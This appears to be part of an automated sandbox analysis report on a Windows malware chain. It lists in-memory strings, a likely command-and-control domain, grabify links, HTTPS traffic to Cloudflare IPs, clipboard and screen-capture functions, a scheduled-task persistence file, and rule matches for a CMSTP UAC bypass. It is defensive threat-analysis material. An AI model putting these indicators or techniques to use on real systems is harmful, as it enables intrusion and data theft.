                          Source: yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                          Source: powershell.exe, 0000002A.00000002.2249861056.000002034DE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: ps.exe, 00000026.00000002.2201127690.00000000026B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/U7WLGD
                          Source: 8sb9w_003.exe, 0000001C.00000002.2039039883.0000000000475000.00000004.00000001.01000000.00000011.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27AF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27B3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2477479962.000001DBE4806000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2466442554.0000002058B76000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/ZATFQO
                          Source: yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: eAzoDbY.exe, 00000019.00000003.2004256745.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2064960562.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065441681.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2146747746.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2218119905.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2237606610.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2216374622.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065047664.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2093938396.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094686130.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2035589838.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/
                          Source: eAzoDbY.exe, 00000019.00000003.2035667693.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2004256745.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2035589838.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu//
                          Source: eAzoDbY.exe, 00000019.00000003.2000710982.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/;
                          Source: eAzoDbY.exe, 00000019.00000003.2164345206.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2165401889.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2145347035.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2146747746.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/O
                          Source: eAzoDbY.exe, 00000019.00000003.2094377397.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2093938396.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094686130.00000000015B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/Y
                          Source: eAzoDbY.exe, 00000019.00000003.2217334858.0000000001595000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2164792928.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065018783.0000000001595000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2236631368.0000000001576000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2146607207.0000000001595000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2216374622.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094581489.0000000001595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/bdWUa
                          Source: eAzoDbY.exe, 00000019.00000003.2214884529.0000000001572000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2236631368.0000000001576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/bdWUa4j
                          Source: eAzoDbY.exe, 00000019.00000003.2189576635.0000000001595000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2236860342.0000000001596000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2145569828.0000000001594000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2215928647.0000000001594000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2217334858.0000000001595000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2146607207.0000000001595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/bdWUadb
                          Source: eAzoDbY.exe, 00000019.00000003.2189429770.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2164792928.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/bdWUag
                          Source: eAzoDbY.exe, 00000019.00000003.2164345206.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2165401889.00000000015B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/c
                          Source: eAzoDbY.exe, 00000019.00000003.2056929429.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2064748127.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094377397.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2064960562.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065441681.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065047664.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2093938396.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094686130.00000000015B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/g
                          Source: eAzoDbY.exe, 00000019.00000003.2164792928.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu:443/bdWUa
                          Source: eAzoDbY.exe, 00000019.00000003.2056929429.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2094377397.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2105569852.00000000015AF000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2093938396.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2035589838.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu:443/bdWUaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          Source: powershell.exe, 00000028.00000002.2227566449.0000019E70DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2404818559.000002035DCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: yo7qmvz.exe, 00000023.00000003.2203839146.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: yo7qmvz.exe, 00000023.00000003.2203839146.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: s7MG2VL.exe, 0000000C.00000003.1894143915.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938230921.0000000003867000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003276985.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                          Source: s7MG2VL.exe, 0000000C.00000003.1894143915.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938230921.0000000003867000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003276985.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                          Source: s7MG2VL.exe, 0000000C.00000003.1946825251.0000000005E8A000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1990737095.000000000386A000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2067136388.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2202795546.000000000335C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                          Source: s7MG2VL.exe, 0000000C.00000003.1946825251.0000000005E8A000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1990737095.000000000386A000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2067136388.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2202795546.000000000335C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: yo7qmvz.exe, 00000023.00000003.2203839146.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: yo7qmvz.exe, 00000023.00000003.2203839146.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: yo7qmvz.exe, 00000023.00000003.2203839146.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61666
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61701 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61701
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61669
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61702
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61662
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61686 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61664
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61665
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61680 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61697 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61693 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61666 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61678
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61690 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61702 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61670
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61662 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61673
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61674
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61683 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61675
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61690
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61698 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61675 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61694 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61688
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61691 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61665 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61689
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61680
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61684 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61681
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61683
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61684
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61685
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61688 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61686
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61669 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61678 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61670 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61674 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61695 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61689 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61691
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61693
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61694
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61695
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61664 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61681 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61697
                          Source: unknownNetwork traffic detected: HTTP traffic on port 61685 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61698
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61731
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61662 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61664 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61665 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61666 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61669 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61670 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61673 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61674 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61675 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61678 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61680 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61681 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61683 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61684 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:61685 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61686 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:61689 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61690 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61694 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61695 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61697 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61701 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61702 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:61740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:61743 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043FF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,17_2_0043FF10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_0043FF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,17_2_0043FF10
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00440B17 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,17_2_00440B17

                          System Summary

                          barindex
                          Source: 28.2.8sb9w_003.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 31.2.svchost.exe.1dbe2750000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.8sb9w_003.exe.83afc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.8sb9w_003.exe.83afc8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 13s1HMkHKv.exeStatic PE information: section name:
                          Source: 13s1HMkHKv.exeStatic PE information: section name: .idata
                          Source: 13s1HMkHKv.exeStatic PE information: section name:
                          Source: rapes.exe.0.drStatic PE information: section name:
                          Source: rapes.exe.0.drStatic PE information: section name: .idata
                          Source: rapes.exe.0.drStatic PE information: section name:
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name:
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name: .idata
                          Source: s7MG2VL[1].exe.11.drStatic PE information: section name:
                          Source: s7MG2VL.exe.11.drStatic PE information: section name:
                          Source: s7MG2VL.exe.11.drStatic PE information: section name: .idata
                          Source: s7MG2VL.exe.11.drStatic PE information: section name:
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeFile created: C:\Windows\Temp\gvh50gjo_3616.sys
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeFile deleted: C:\Windows\Temp\gvh50gjo_3616.sys
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002261F011_2_002261F0
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0022B70011_2_0022B700
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0026404711_2_00264047
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002618D711_2_002618D7
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002251A011_2_002251A0
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0023732011_2_00237320
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0029AB5C11_2_0029AB5C
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00252C2011_2_00252C20
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0022CC4011_2_0022CC40
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0022545011_2_00225450
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0024B4C011_2_0024B4C0
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00265CD411_2_00265CD4
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00265DF411_2_00265DF4
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_00224EF011_2_00224EF0
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_0024F6DB11_2_0024F6DB
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BF4CB015_2_00BF4CB0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BF646015_2_00BF6460
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BB553B15_2_00BB553B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BD1F5015_2_00BD1F50
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BD98A015_2_00BD98A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BF78A015_2_00BF78A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BF609015_2_00BF6090
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C090F015_2_00C090F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C0E0F015_2_00C0E0F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C1B0F015_2_00C1B0F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BCA0F015_2_00BCA0F0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BC50E015_2_00BC50E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BD00E015_2_00BD00E0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BD28C015_2_00BD28C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BBE03015_2_00BBE030
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C0C05015_2_00C0C050
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BDE02015_2_00BDE020
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BCD81015_2_00BCD810
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BEA81015_2_00BEA810
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C0D07015_2_00C0D070
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00BB100015_2_00BB1000
